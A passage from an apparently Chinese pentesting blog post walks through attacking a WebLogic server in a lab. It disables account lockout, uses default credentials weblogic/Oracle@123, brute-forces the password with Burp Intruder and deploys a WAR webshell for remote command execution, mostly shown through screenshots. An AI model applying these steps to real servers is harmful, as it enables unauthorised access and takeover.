<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.0.10:7001/console/login/LoginForm.jsp # 访问 /console/ 自动跳转至/console/login/LoginForm.jsp</span><br></pre></td></tr></table></figure>

<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/14.png"></p>
</li>
<li><p>取消用户锁定</p>
<blockquote>
<p>重点: <code>用户封锁</code>若开启, 爆破密码时系统会锁定 ! (靶场默认为开启状态)</p>
</blockquote>
<p>使用默认账号:密码: <code>weblogic</code> : <code>Oracle@123</code>登录到后台修改配置</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/15.png"></p>
<blockquote>
<p>按照上图操作, 关闭用户封锁并重启靶场</p>
</blockquote>
</li>
</ul>
<hr>
<h4 id="03-账户爆破"><a href="#03-账户爆破" class="headerlink" title="03 账户爆破"></a>03 账户爆破</h4><ul>
<li><p>登录获取数据包</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/16.png"></p>
<blockquote>
<p>账户名weblogic, 密码123, (也可随意输入, 主要是为了获取登录数据包)</p>
</blockquote>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/17.png"></p>
<blockquote>
<p>将数据包发送至Intruder模块</p>
</blockquote>
</li>
<li><p>账户爆破</p>
<p>案例固定用户名, 只爆破一个字段<code>password</code>(只体现爆破逻辑, 实战更多采用字典爆破)</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/18.png"></p>
</li>
<li><p>密码爆破成功</p>
<blockquote>
<p>状态码一致均为302跳转, 通过Length与完整的Response内容差异判断</p>
</blockquote>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/19.png"></p>
</li>
</ul>
<hr>
<h4 id="04-Webshell写入"><a href="#04-Webshell写入" class="headerlink" title="04 Webshell写入"></a>04 Webshell写入</h4><p>本质是在<code>Weblogic</code>上部署程序(使用WAR包方式), <code>WAR</code>包制作参考<a href="#03-war%E5%8C%85%E9%83%A8%E7%BD%B2">前文WAR包部署章节</a></p>
<ul>
<li><p>基于Weblogic_WAR程序部署流程</p>
<blockquote>
<p>以下图示一站式部署Weblogic程序</p>
</blockquote>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/20.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/21.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/22.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/23.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/24.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/25.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/26.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/27.png"></p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/28.png"></p>
</li>
<li><p>Webshell地址</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.0.10:7001/test/test.jsp</span><br></pre></td></tr></table></figure>

<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/29.png"></p>
<blockquote>
<p>响应200, 程序可正常访问</p>
</blockquote>
</li>
<li><p>RCE</p>
<p><img data-src="/2026/09/03/middleware/2026-09-03-middleware/30.png"></p>
</li>
</ul>
<hr>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="followme">
  <span>Welcome to my other publishing channels</span>

  <div class="social-list">

      <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/middleware/" rel="tag"># middleware</a>
              <a href="/tags/%E4%B8%AD%E9%97%B4%E4%BB%B6/" rel="tag"># 中间件</a>
              <a href="/tags/tomcat/" rel="tag"># tomcat</a>
              <a href="/tags/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/" rel="tag"># 暴力破解</a>
              <a href="/tags/war/" rel="tag"># war</a>
              <a href="/tags/weblogic/" rel="tag"># weblogic</a>
              <a href="/tags/WeblogicScan/" rel="tag"># WeblogicScan</a>
              <a href="/tags/jar/" rel="tag"># jar</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2026/08/29/web-security/unserialize/2026-08-29-unserialize/" rel="prev" title="Unserialize">
                  <i class="fa fa-angle-left"></i> Unserialize
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments utterances-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Byron</span>
  </div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<script class="next-config" data-name="utterances" type="application/json">{"enable":true,"repo":"byroins/penetration-testing","issue_term":"pathname","theme":"github-light"}</script>
<script src="/js/third-party/comments/utterances.js" defer></script>

</body>
</html>
